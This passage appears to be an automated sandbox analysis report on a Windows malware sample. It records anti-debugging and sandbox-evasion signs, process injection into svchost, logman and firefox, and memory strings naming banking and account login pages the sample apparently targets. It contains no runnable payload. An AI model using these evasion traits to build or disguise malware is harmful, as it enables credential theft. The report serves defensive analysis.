Source:	Binary string: wntdll.pdb source: NWPZbNcRxL.exe, 00000000.00000003.2061708811.0000000003850000.00000004.00001000.00020000.00000000.sdmp, NWPZbNcRxL.exe, 00000000.00000003.2061525090.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2322396979.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2417369880.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2320241917.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2417369880.0000000003900000.00000040.00001000.00020000.00000000.sdmp, logman.exe, logman.exe, 00000005.00000003.2417406704.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000003.2419688042.0000000002F68000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4504779497.00000000032AE000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4504779497.0000000003110000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: logman.exe, 00000005.00000002.4503848678.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.000000000373C000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000000.2484612545.000000000311C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2705213273.000000002D9BC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: logman.pdbGCTL source: svchost.exe, 00000002.00000003.2384783165.0000000003232000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384691800.000000000321B000.00000004.00000020.00020000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000004.00000002.4504092986.0000000001538000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: logman.exe, 00000005.00000002.4503848678.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.000000000373C000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000000.2484612545.000000000311C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2705213273.000000002D9BC000.00000004.80000000.00040000.00000000.sdmp

Source: NWPZbNcRxL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: NWPZbNcRxL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: NWPZbNcRxL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: NWPZbNcRxL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: NWPZbNcRxL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C14B37 LoadLibraryA,GetProcAddress,

0_2_00C14B37

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C306FE push es; ret	0_2_00C3070B
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C3070E push es; ret	0_2_00C3070F
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C30710 push es; ret	0_2_00C3071B
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C30720 push es; ret	0_2_00C30723
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C30724 push es; ret	0_2_00C30727
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C3072A push es; ret	0_2_00C30733
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C30734 push es; ret	0_2_00C30737
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C30739 push es; ret	0_2_00C30753
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C38945 push ecx; ret	0_2_00C38958
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C32BDC push ds; ret	0_2_00C32BE2
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C253ED push edx; retn 0000h	0_2_00C253EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040D156 push esp; retf	2_2_0040D159
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041197F pushfd ; iretd	2_2_00411989
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403190 push eax; ret	2_2_00403192
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004181BD push ds; ret	2_2_004181BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00408293 push esi; retf	2_2_004082B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00406517 push ecx; iretd	2_2_00406518
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004116D4 push ebp; iretd	2_2_004116DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401F63 push ebp; iretd	2_2_00401F64
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401764 push ss; ret	2_2_00401766
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040172C push ebp; ret	2_2_0040172D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390225F pushad ; ret	2_2_039027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039027FA pushad ; ret	2_2_039027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039309AD push ecx; mov dword ptr [esp], ecx	2_2_039309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390283D push eax; iretd	2_2_03902858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03901368 push eax; iretd	2_2_03901369
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0311225F pushad ; ret	5_2_031127F9
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031127FA pushad ; ret	5_2_031127F9
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031409AD push ecx; mov dword ptr [esp], ecx	5_2_031409B6
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0311283D push eax; iretd	5_2_03112858
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0274C25B push ecx; retf	5_2_0274C267

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00C148D7
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C95376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00C95376

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C33187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00C33187

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	API/Special instruction interceptor: Address: 1028204
Source: C:\Windows\SysWOW64\logman.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\logman.exe	API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\logman.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\logman.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\logman.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\logman.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\logman.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\logman.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0397096E rdtsc

2_2_0397096E

Source: C:\Windows\SysWOW64\logman.exe	Window / User API: threadDelayed 2245			Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Window / User API: threadDelayed 7727			Jump to behavior

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-105428

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	API coverage: 4.7 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\logman.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\logman.exe TID: 3364	Thread sleep count: 2245 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe TID: 3364	Thread sleep time: -4490000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe TID: 3364	Thread sleep count: 7727 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe TID: 3364	Thread sleep time: -15454000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe TID: 1276	Thread sleep time: -85000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe TID: 1276	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe TID: 1276	Thread sleep time: -48000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe TID: 1276	Thread sleep count: 44 > 30	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe TID: 1276	Thread sleep time: -44000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\logman.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\logman.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C7445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00C7445A
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C7C6D1 FindFirstFileW,FindClose,	0_2_00C7C6D1
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C7C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00C7C75C
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C7EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C7EF95
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C7F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C7F0F2
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C7F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C7F3F3
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00C737EF
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C73B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00C73B12
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C7BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C7BCBC
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0274C640 FindFirstFileW,FindNextFileW,FindClose,	5_2_0274C640

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00C149A0

Source: J14f8-3.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: J14f8-3.5.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: J14f8-3.5.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: J14f8-3.5.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: J14f8-3.5.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: J14f8-3.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: J14f8-3.5.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: J14f8-3.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: J14f8-3.5.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: WnOFOMnqmLQAP.exe, 00000007.00000002.4503877098.000000000102F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
Source: J14f8-3.5.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: J14f8-3.5.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: J14f8-3.5.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: J14f8-3.5.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: J14f8-3.5.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: J14f8-3.5.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: firefox.exe, 00000008.00000002.2706673122.000001EBEDA0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: J14f8-3.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: J14f8-3.5.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: J14f8-3.5.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: J14f8-3.5.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: J14f8-3.5.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: J14f8-3.5.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: J14f8-3.5.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: J14f8-3.5.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: J14f8-3.5.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: J14f8-3.5.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: logman.exe, 00000005.00000002.4503848678.0000000002B64000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
Source: J14f8-3.5.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: J14f8-3.5.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: J14f8-3.5.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: J14f8-3.5.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: J14f8-3.5.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: J14f8-3.5.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

API call chain: ExitProcess graph end node

graph_0-104202

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0397096E rdtsc

2_2_0397096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417743 LdrLoadDll,

2_2_00417743

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C83F09 BlockInput,

0_2_00C83F09

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C13B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00C13B3A

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C45A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00C45A7C

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C14B37 LoadLibraryA,GetProcAddress,

0_2_00C14B37

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_01028470 mov eax, dword ptr fs:[00000030h]	0_2_01028470
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_010284D0 mov eax, dword ptr fs:[00000030h]	0_2_010284D0
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_01026E50 mov eax, dword ptr fs:[00000030h]	0_2_01026E50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]	2_2_03928397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]	2_2_03928397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]	2_2_03928397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]	2_2_0392E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]	2_2_0392E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]	2_2_0392E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]	2_2_0395438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]	2_2_0395438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]	2_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]	2_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]	2_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]	2_2_039D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]	2_2_039D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039EC3CD mov eax, dword ptr fs:[00000030h]	2_2_039EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]	2_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]	2_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]	2_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]	2_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B63C0 mov eax, dword ptr fs:[00000030h]	2_2_039B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039663FF mov eax, dword ptr fs:[00000030h]	2_2_039663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]	2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]	2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]	2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]	2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]	2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]	2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]	2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]	2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392C310 mov ecx, dword ptr fs:[00000030h]	2_2_0392C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]	2_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A08324 mov ecx, dword ptr fs:[00000030h]	2_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]	2_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]	2_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03950310 mov ecx, dword ptr fs:[00000030h]	2_2_03950310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]	2_2_0396A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]	2_2_0396A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]	2_2_0396A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]	2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]	2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]	2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B035C mov ecx, dword ptr fs:[00000030h]	2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]	2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]	2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FA352 mov eax, dword ptr fs:[00000030h]	2_2_039FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D8350 mov ecx, dword ptr fs:[00000030h]	2_2_039D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D437C mov eax, dword ptr fs:[00000030h]	2_2_039D437C
